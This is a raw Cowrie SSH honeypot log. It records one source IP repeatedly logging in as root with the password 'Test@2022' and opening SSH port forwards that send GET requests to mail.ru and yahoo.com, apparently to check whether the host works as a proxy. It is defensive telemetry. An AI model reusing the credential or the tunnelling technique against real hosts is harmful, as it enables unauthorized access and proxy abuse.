{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:20.957058Z","src_ip":"77.83.207.83","session":"efed02b18cf3"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.007658Z","src_ip":"77.83.207.83","session":"efed02b18cf3"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.259356Z","src_ip":"77.83.207.83","session":"efed02b18cf3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17815,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17815","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.311109Z","session":"efed02b18cf3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.362795Z","src_ip":"77.83.207.83","session":"efed02b18cf3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":75,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:75","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.504800Z","session":"efed02b18cf3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.555253Z","src_ip":"77.83.207.83","session":"efed02b18cf3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":10594,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:10594","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.697196Z","session":"efed02b18cf3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.747954Z","src_ip":"77.83.207.83","session":"efed02b18cf3"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.799381Z","src_ip":"77.83.207.83","session":"efed02b18cf3"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49378,"dst_ip":"1.2.3.4","dst_port":22,"session":"73cfa81c1b97","protocol":"ssh","message":"New connection: 77.83.207.83:49378 (1.2.3.4:22) [session: 73cfa81c1b97]","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.849742Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.850542Z","src_ip":"77.83.207.83","session":"73cfa81c1b97"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:21.902089Z","src_ip":"77.83.207.83","session":"73cfa81c1b97"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.155354Z","src_ip":"77.83.207.83","session":"73cfa81c1b97"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3704,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3704","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.207012Z","session":"73cfa81c1b97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.257956Z","src_ip":"77.83.207.83","session":"73cfa81c1b97"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":25151,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:25151","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.401260Z","session":"73cfa81c1b97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.452386Z","src_ip":"77.83.207.83","session":"73cfa81c1b97"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":18128,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:18128","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.597176Z","session":"73cfa81c1b97"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.648598Z","src_ip":"77.83.207.83","session":"73cfa81c1b97"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.700365Z","src_ip":"77.83.207.83","session":"73cfa81c1b97"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49479,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2a0aba475d0","protocol":"ssh","message":"New connection: 77.83.207.83:49479 (1.2.3.4:22) [session: b2a0aba475d0]","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.748818Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.749422Z","src_ip":"77.83.207.83","session":"b2a0aba475d0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:22.799413Z","src_ip":"77.83.207.83","session":"b2a0aba475d0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.047523Z","src_ip":"77.83.207.83","session":"b2a0aba475d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":14202,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:14202","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.097972Z","session":"b2a0aba475d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.148466Z","src_ip":"77.83.207.83","session":"b2a0aba475d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":13855,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:13855","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.288118Z","session":"b2a0aba475d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.338273Z","src_ip":"77.83.207.83","session":"b2a0aba475d0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":91,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:91","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.480077Z","session":"b2a0aba475d0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.529930Z","src_ip":"77.83.207.83","session":"b2a0aba475d0"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.580495Z","src_ip":"77.83.207.83","session":"b2a0aba475d0"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49577,"dst_ip":"1.2.3.4","dst_port":22,"session":"78ce1bee67a6","protocol":"ssh","message":"New connection: 77.83.207.83:49577 (1.2.3.4:22) [session: 78ce1bee67a6]","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.629197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.639390Z","src_ip":"77.83.207.83","session":"78ce1bee67a6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.679119Z","src_ip":"77.83.207.83","session":"78ce1bee67a6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.926134Z","src_ip":"77.83.207.83","session":"78ce1bee67a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":29454,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:29454","sensor":"my-vps","timestamp":"2025-08-31T03:54:23.976484Z","session":"78ce1bee67a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.026048Z","src_ip":"77.83.207.83","session":"78ce1bee67a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":14075,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:14075","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.167806Z","session":"78ce1bee67a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.217276Z","src_ip":"77.83.207.83","session":"78ce1bee67a6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":26522,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:26522","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.359823Z","session":"78ce1bee67a6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.409369Z","src_ip":"77.83.207.83","session":"78ce1bee67a6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.459623Z","src_ip":"77.83.207.83","session":"78ce1bee67a6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":49681,"dst_ip":"1.2.3.4","dst_port":22,"session":"28dae21eb107","protocol":"ssh","message":"New connection: 77.83.207.83:49681 (1.2.3.4:22) [session: 28dae21eb107]","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.508512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.509498Z","src_ip":"77.83.207.83","session":"28dae21eb107"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.559163Z","src_ip":"77.83.207.83","session":"28dae21eb107"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.807613Z","src_ip":"77.83.207.83","session":"28dae21eb107"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11605,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11605","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.859134Z","session":"28dae21eb107"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:24.909077Z","src_ip":"77.83.207.83","session":"28dae21eb107"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"77.83.207.83","src_port":20164,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20164","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.052220Z","session":"28dae21eb107"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:54:25.102020Z","src_ip":"77.83.207.83","session":"28dae21eb107"}
